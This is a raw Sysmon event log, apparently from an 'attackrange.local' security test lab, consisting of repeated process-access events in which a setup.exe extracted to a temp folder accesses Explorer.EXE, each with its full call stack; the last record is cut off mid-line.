13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C: